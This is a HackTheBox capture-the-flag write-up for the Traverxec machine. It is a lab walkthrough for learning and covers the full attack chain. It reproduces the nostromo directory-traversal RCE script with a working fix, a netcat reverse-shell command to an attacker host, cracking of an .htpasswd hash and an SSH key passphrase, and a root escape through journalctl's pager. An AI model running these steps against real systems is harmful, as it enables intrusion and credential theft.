Traverxec

Always stay close to what keeps you feeling alive!

HackTheBox Traverxec Machine Info Card

Traverxec is an easy difficulty machine running Linux. It tests your knowledge in Basic enumeration and privelege escalation using a common exploit and GTFOBin.

Be sure to checkout the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan traverxec.htb -oX nmap.xml
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 17:15 PST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.22s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

We see port 80 open and straight away we notice nostromo 1.9.6.

Foothold

Using searchsploit we find some vulns:

searchsploit nostromo
--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                       |  Path
                                                                                                                                                                     | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                                                                 | exploits/multiple/remote/47573.rb
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                                                                 | exploits/linux/remote/35466.sh
--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

We will take a look at 35466.sh script to see what that’s about. Searchsploit scripts notoriously have different unicode formats and whitespace from other operating systems and what not that cause the script to fail or run incorrectly. Not only that but they generally have comments that don’t use comment syntax of the language it is written in. So open up the file with your preferred editor and just take what you need.

We end up with the following:

nano nhttpd.sh
#!/bin/sh
######################################
#                                    #
#  RedTeam Pentesting GmbH           #
#  kontakt@redteam-pentesting.de     #
#  http://www.redteam-pentesting.de  #
#                                    #
######################################

if [ $# -lt 3 ]; then
    echo "Usage: $(basename $0) HOST PORT COMMAND..."
    exit 2
fi


HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

Upon running this script as is it runs without errors but nothing happens. At closer inspection we see the url encode ..%2f..%2f..%2 which equates to ../../../ our directory traversal.

Changing this to a carriage return instead, such as .%0d./.%0d./.%0d./.%0d. and changing #!/bin/sh to #!/bin/bash fixes the issue:

./nhttpd.sh traverxec.htb 80 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now lets connect with netcat.

First setup our netcat listener:

nc -lvp 1234

Then we use our local script to issue our netcat command remotely on traverxec:

./nhttpd.sh traverxec.htb 80 nohup nc <attacker-ip> 1234 -e /bin/bash &

From here we can upgrade the shell!

Ok so we are in as user www-data and our working directory is /usr/bin.

First things first let’s see what other users we have on this machine. Taking a look in /home we see a user called david but we see that we do not have permissions to access their home directory.

Htpasswd

Next we will do a search for hidden files to see if we uncover anything:

www-data@traverxec:/usr/bin$ find / -name ".*" -ls 2>&1 | grep -v "Permission denied"
.... SNIP ....		.... SNIP ....		.... SNIP ....
11005      4 -rw-r--r--   1 root     bin            41 Oct 25 15:20 /var/nostromo/conf/.htpasswd

Having a look inside this file we find a hash:

www-data@traverxec:/usr/bin$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Let’s take this over to our attacker machine and see if we can crack it:

john htpasswd.txt --wordlist=/root/wordlists/passwords.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Now....4me       (?)
1g 0:00:14:48 DONE (2019-12-05 00:05) 0.001125g/s 312184p/s 312184c/s 312184C/s NuGiEr37..Novara
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Ok so we have a password. Now let’s go see where we can use it.

It doesn’t work with ssh or su david so we need to know more about how nostromo works and where the .htpasswd is being used.

Doing some research about nostromo it seems that the folder that stores the configuration files is /var/nostromo/conf where we found our .htpaswd. Let’s take a look in this directory and see if there is anything interesting:

www-data@traverxec:/usr/bin$ ls -l /var/nostromo/conf
total 8
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin  498 Oct 25 15:20 nhttpd.conf

We need to know more about how nostromo’s configuration works so we will open up the manpage with man nhttpd so we have a reference for the configuration file.

Now let’s have a look at how things are set up:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf 
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

Looking at the config a couple of things stand out. We have the Basic Authentication set up and can see that the password hash is located at /var/nostromo/conf/.htpasswd of which we have already cracked.

The other thing that stands out is that there is a section called HOMEDIRS. I am assuming this is similar to apache.

On reviewing the manual we see that homedirs sets up a path on the webserver to any users home directories found in /home. We see that to access a users home directory from the webserver we need to append the username to the url such as http://traverxec.htb/~david.

In going to this page we are presented with a message:

Traverxec David Screenshot

Looking further in to the HOMEDIRS config within the manual we also see that one can restrict access to a sub folder rather than giving access to the users whole home directory. This has been set to public_www.

Let’s see if we can take a peak in this directory:

www-data@traverxec:/var/nostromo/conf$ ls -l /home/david/public_www
total 8
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area

And there is our protected folder it seems. Let’s go see if the password works with the username david at the web address http://traverxec.htb/~david/protected-file-area:

Traverxec Protected File Area Screenshot

Yep we get access and get a directory index with the file backup-ssh-identity-files.tgz. That will be our ssh access, w00t!

SSH Identity

We download the file and unzip it and take a look in /home/david/.ssh. Remember, dot files and folders are hidden so when you look in the extracted folders it will look like there is nothing there. Use the command ls -la to show them.

Let’s try using our new found ssh key:

ssh -i .ssh/id_rsa david@traverxec.htb
Enter passphrase for key '.ssh/id_rsa':

We get asked for a passphrase and our password we found is a no go. Looks like we have some more cracking to do!

User

Fireup ssh2john and convert the key to a readable format for John The Ripper:

python ssh2john.py id_rsa > id_rsa.hash

Now let’s crack the hash with John The Ripper:

john --wordlist=/root/wordlists/passwords.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hu....er           (/root/Documents/traverxec/backup-ssh-identity-files/home/david/.ssh/id_rsa)
74g 0:00:01:13 DONE (2019-12-05 04:12) 1.009g/s 4131Kp/s 4131Kc/s 4131KC/s 233091..hielox
Session completed

Now that we have gotten our ssh key passphrase let’s try logging in again:

ssh -i id_rsa david@traverxec.htb
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ cat user.txt
7db0b48469....50d9782f3d

And there were are. We have our user flag!

Now let’s move on to root.

Root

When we take a look in davids home directory we see a script in the bin folder called server-stats.sh:

david@traverxec:~/bin$ cat server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line is using sudo. This will most likley be our exploit.

The journalctl command is a gtfobin because it uses less which can used to grab a shell.

Let’s have a run of the command that is on the last line. The pipe (|) and execution of the cat command is pointless so let’s get rid of that:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:48:54 EST. --
Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Dec 06 08:08:28 traverxec nhttpd[457]: started
Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server.
Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND=validate

Ok so here we see a problem. We like to see what we are doing so we always have our terminal windows maximized. Because of this the command runs with less but then exits.

Making the terminal window smaller and running the command again so less can do it’s thing does the trick.

When less shows lines 1-6/6 (END) type in !/bin/bash to grab the root shell:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:53:42 EST. --
Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after
Dec 06 08:08:28 traverxec nhttpd[457]: started
Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server.
Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND=
lines 1-6/6 (END)
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt
9aa36a6d76....78f6e0d906

Now wasn’t that fun? Enjoy :)

Conclusion

This machine was a good learning curve in making sure you research the services that you are trying to exploit. Using what we had at hand on the machine we were able to understand what paths we needed to take both for user and root. We should never underestimate the importance of active research.

Hack The Box